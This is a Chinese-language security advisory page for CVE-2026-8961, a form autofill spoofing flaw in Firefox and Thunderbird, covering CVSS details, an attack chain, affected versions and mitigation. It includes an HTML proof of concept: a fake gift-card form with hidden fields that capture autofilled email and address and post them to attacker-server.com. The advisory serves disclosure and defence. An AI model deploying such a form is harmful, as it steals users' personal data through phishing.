IPBUF安全漏洞报告
English
CVE-2026-8961 CVSS 6.5 中危

CVE-2026-8961 Firefox表单自动填充欺骗漏洞

披露日期: 2026-05-19

漏洞信息

漏洞编号
CVE-2026-8961
漏洞类型
欺骗
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Firefox, Firefox ESR, Thunderbird

相关标签

SpoofingFirefoxThunderbirdAutofillBrowser

漏洞概述

CVE-2026-8961是Mozilla Firefox和Thunderbird中表单自动填充组件的一个欺骗漏洞。攻击者可利用此缺陷,通过诱导用户访问恶意网页并触发自动填充机制,欺骗用户或浏览器组件。此过程可能导致用户输入的敏感数据被错误处理或劫持,虽然无需认证,但需要一定的用户交互才能成功利用。

技术细节

该漏洞的核心在于表单自动填充机制对DOM结构的信任校验不足。攻击者可以构造特定的HTML页面,利用CSS样式(如透明度、定位或Z轴层级)掩盖真实的输入字段,或者创建与合法网站相似的钓鱼界面。当用户在受影响的浏览器中访问该页面并触发UI交互(如点击或聚焦)时,浏览器会依据已保存的表单信息自动填充数据。由于存在逻辑缺陷,自动填充的数据可能被填充到攻击者预设的、对用户不可见的字段中,或者表单的提交目标被篡改。CVSS向量显示完整性影响为高(I:H),意味着攻击者能够成功欺骗系统逻辑,导致数据流向被非法控制或数据被恶意篡改,而无需任何预先认证。

攻击链分析

STEP 1
准备阶段
攻击者构建包含恶意HTML表单的网站,表单中包含隐藏字段用于捕获敏感信息。
STEP 2
诱导访问
攻击者通过钓鱼邮件或社交工程手段诱导受害者访问该恶意网页。
STEP 3
用户交互
受害者在页面上进行点击或聚焦等操作,触发浏览器的表单自动填充功能。
STEP 4
数据欺骗
浏览器将敏感信息填充到不可见的隐藏字段中,攻击者利用漏洞逻辑劫持这些数据。
STEP 5
完成利用
表单被提交,受害者的敏感数据被发送至攻击者控制的服务器,实现完整性破坏。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- PoC for Form Autofill Spoofing --> <html> <head> <title>Autofill Test</title> </head> <body> <h3>Free Gift Card</h3> <form action="http://attacker-server.com/collect" method="POST"> <!-- Visible field to trigger interaction --> <input type="text" placeholder="Enter Name" autocomplete="name"> <!-- Hidden fields to steal autofill data --> <input type="text" name="email" style="opacity:0; position:absolute; top:-1000px;" autocomplete="email"> <input type="text" name="address" style="opacity:0; position:absolute; top:-1000px;" autocomplete="street-address"> <button type="submit">Claim</button> </form> </body> </html>

影响范围

Firefox < 151
Firefox ESR < 140.11
Thunderbird < 151
Thunderbird < 140.11

防御指南

临时缓解措施
建议用户在未安装安全补丁前,暂时关闭浏览器的自动填充功能,并避免在不信任的网站上填写个人信息。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表